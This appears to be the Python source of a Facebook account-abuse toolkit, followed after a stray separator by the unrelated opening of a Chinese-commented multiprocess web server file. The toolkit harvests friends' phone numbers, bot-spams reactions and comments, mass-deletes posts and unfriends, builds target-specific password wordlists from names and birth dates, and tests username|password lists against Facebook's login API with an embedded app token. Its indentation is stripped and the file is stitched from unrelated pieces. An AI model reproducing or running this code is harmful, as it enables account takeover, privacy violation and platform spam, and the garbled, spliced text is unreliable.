raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
elif bots == '1':
menu_react()
elif bots == '2':
grup_react()
elif bots == '3':
bot_komen()
elif bots == '4':
grup_komen()
elif bots == '5':
deletepost()
elif bots == '6':
accept()
elif bots == '7':
unfriend()
elif bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
elif aksi == '1':
tipe = 'LIKE'
react()
elif aksi == '2':
tipe = 'LOVE'
react()
elif aksi == '3':
tipe = 'WOW'
react()
elif aksi == '4':
tipe = 'HAHA'
react()
elif aksi == '5':
tipe = 'SAD'
react()
elif aksi == '6':
tipe = 'ANGRY'
react()
elif aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
elif aksi == '1':
tipe = 'LIKE'
reactg()
elif aksi == '2':
tipe = 'LOVE'
reactg()
elif aksi == '3':
tipe = 'WOW'
reactg()
elif aksi == '4':
tipe = 'HAHA'
reactg()
elif aksi == '5':
tipe = 'SAD'
reactg()
elif aksi == '6':
tipe = 'ANGRY'
reactg()
elif aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mGroup name \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mGroup name \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting to remove posts\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
piro = 0
for p in asus['data']:
id = p['id']
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish \x1b[1;96m' + str(piro)
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Success'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
elif other == '1':
status()
elif other == '2':
wordlist()
elif other == '3':
check_akun()
elif other == '4':
grupsaya()
elif other == '5':
guard()
elif other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mFill in the complete target data below'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mFirst Name \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mMiddle Name \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mLast Name \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNickname \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mDate of Birth >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mIf single, just SKIP this part :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mPartner Name \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mPartner Nickname \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mPartner Date of Birth >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mFile format\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
f = open('grupid.txt', 'w')
for p in gud['data']:
nama = p['name']
id = p['id']
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
elif g == '2':
non = 'false'
gaz(toket, non)
elif g == '0':
lain()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
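# Note (added for clarity, not in the original script): gaz() below toggles Facebook's
# profile picture guard by posting the IsShieldedSetMutation GraphQL mutation for the
# user id returned by get_userid(); 'enable' is expected to be the string 'true' or 'false'.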
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
elif '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
net09_web_PWB4.py
|
"""PWB4.0 多进程静态web服务器"""
'''
@Time : 2018/1/24 下午3:04
@Author : scrappy_zhang
@File : net09_web_PWB4.py
'''
import socket
import re
import multiprocessing
SERVER_ADDR = (HOST, PORT) = '', 8888 # server address
VERSION = 4.0 # web server version number
STATIC_PATH = './static/'
class HTTPServer():
def __init__(self, server_address):
"""初始化服务器TCP套接字"""
self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
